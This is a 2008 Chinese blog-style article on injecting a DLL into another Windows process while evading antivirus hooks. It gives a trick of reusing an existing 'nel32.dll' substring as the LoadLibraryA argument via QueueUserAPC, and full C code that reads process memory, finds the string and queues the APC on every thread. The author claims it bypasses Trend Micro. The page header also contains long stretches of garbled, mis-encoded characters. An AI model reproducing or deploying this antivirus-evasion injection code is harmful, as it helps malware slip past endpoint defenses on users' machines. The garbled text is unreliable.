绕过主动防御的代码注入方法思考

　2008-10-27 16:51:13　来源：WEB开发网　闂傚倸鍊风欢姘缚瑜嶈灋闁圭虎鍠栫粻顖炴煥閻曞倹瀚�

闂傚倸鍊风粈渚€骞夐敓鐘插瀭闁汇垹鐏氬畷鏌ユ煙閹殿喖顣奸柛搴＄У閵囧嫰骞掗幋婵冨亾閻㈢ǹ纾婚柟鐐灱濡插牊绻涢崱妤冃℃繛宀婁簽缁辨捇宕掑鎵佹瀸闂佺懓鍤栭幏锟�

濠电姷鏁告慨顓㈠箯閸愵喖宸濇い鎾寸箘閹规洟姊绘笟鈧ḿ褍煤閵堝悿娲Ω閳轰胶鍔﹀銈嗗笂閼冲爼鍩婇弴銏＄厪闁搞儮鏅涙禒褏绱掓潏鈺佷槐闁轰焦鎹囬弫鎾绘晸閿燂拷闂傚倸鍊风欢姘缚瑜嶈灋闁圭虎鍠栫粻顖炴煥閻曞倹瀚�　　闂傚倸鍊烽懗鑸电仚缂備胶绮〃鍛村煝瀹ュ鍗抽柕蹇曞У閻庮剟姊虹紒妯哄闁诲繑姘ㄩ埀顒佸嚬閸撶喎顫忓ú顏勫瀭妞ゆ洖鎳庨崜浼存⒑闁偛鑻晶顔剧磼婢跺﹦绉虹€殿喖顭锋俊姝岊槷闁稿鎹囧Λ鍐ㄢ槈濞嗗繑娈橀梻浣风串缂嶁偓濞存粠鍓熼崺鈧い鎺戝€归弳顒勬煕鐎ｎ亷韬€规洑鍗冲鍊燁槾闁哄棴绠撻弻銊╂偆閸屾稑顏�

核心提示：目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入，关于代码注入Ring3层的方法主要有：l 远程线程CreateRemoteThreadl 消息钩子SetWindowsHookExl Ring3

目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。

关于代码注入Ring3层的方法主要有：

l 远程线程CreateRemoteThread

l 消息钩子SetWindowsHookEx

l Ring3 APC QueueUserApc

l 修改线程上下文SetContextThread

其中第一种和第三种方法需要传入一个param，但是要求这个param必须在目标进程内存空间，之前的一些方法比较笨重，直接在目标进程VirtualAllocEx内存，然后把希望的参数内容写入这个内存，使用了WriteProcessMemory函数，而这个函数是被hook的，所以杀软可以很容易的拦截代码注入行为。

仔细想想，杀软的这种防御是很失败的！原因是为了要一个param，攻击者完全没有必要做这么大的动作去目标进程内存空间申请内存并写内存，我在思考是否可以不用WriteProcessMemory函数呢？反正我的目的就是得到一个合理的param，并且这个param是在目标进程内存空间即可！

思考后，原来一切是这么容易啊，哈哈！乐了我半天~~~

举个例子：假设我是这样注入的：

QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

我想让上面的param的内容是一个“xxx.dll”,就可以了，而且要求这个param是在目标进程内存空间

您想到了么？哈哈

答案：直接在目标进程搜索一个这样的字符串“nel32.dll”就可以啦！因为“kernel32.dll” 这样的字符串是一定存在的，那么为了和“kernel32.dll” 不一样，那就随便使用一下“nel32.dll”，或者“el32.dll”，都是可以的啊！最后在往windows目录下面撂进入一个nel32.dll，这样注入大部分杀软都是不能拦截到的！哈哈！

写了段程序，做了个试验，仅测试了下趋势，完美绕过！其实杀软稍后测试。。。

DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList) { TIDLIST *pCurrentTid = pThreadIdList ; const char szInjectModName[] = "nel32.dll"; DWORD dwLen = strlen(szInjectModName) ; 　　 ////////////////////////////////////////////////////////////////////////// //不写目标进程的内存 //直接在目标进程中搜索出 nel32.dll 这样的字符串并注入 ////////////////////////////////////////////////////////////////////////// int bufflen=30000; char *buffer=(char *)malloc(sizeof(char)*bufflen); DWORD dwNumberOfBytesRead; DWORD defaultAddress; //获得该进程的基址 HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ; if(!hSnapshot) { 　 printf("CreateToolhelp32Snapshot error!n"); 　 return 0; } MODULEENTRY32 me = { sizeof(me) }; 　　BOOL fOk =Module32First(hSnapshot,&me); if(!fOk) { 　 printf("Module32First error!n"); 　 return 0; } 　　for (; fOk; fOk = Module32Next(hSnapshot,&me)) 　　{ 　 printf("%s process module name = %sn",processName,me.szModule); 　　　　// 取得进程模块基址　 if(stricmp(me.szModule,processName)==0) 　 { 　　defaultAddress=(DWORD)me.modBaseAddr; 　　printf("%s process module base = 0x%08Xn",processName,defaultAddress); 　　break; 　 } 　　} //搜索 if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead)) { 　 printf("ReadProcessMemory error!n"); 　 return 0; } for(int i=0;i<bufflen-dwLen;i++) { 　 if(strnicmp(buffer+i,szInjectModName,dwLen)==0) 　 { 　　printf("found nel32.dll already!... %sn",buffer+i); 　　while (pCurrentTid) 　　{ 　　 HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ; 　　　　 if (hThread != NULL) 　　 { 　　　// 　　　// 注入DLL到指定进程　　　// 　　　QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ; 　　 } 　　　　 printf("TID:%dn", pCurrentTid->dwTid) ; 　　 pCurrentTid = pCurrentTid->pNext ; 　　} 　　break; 　 } } 　　 return 0 ; }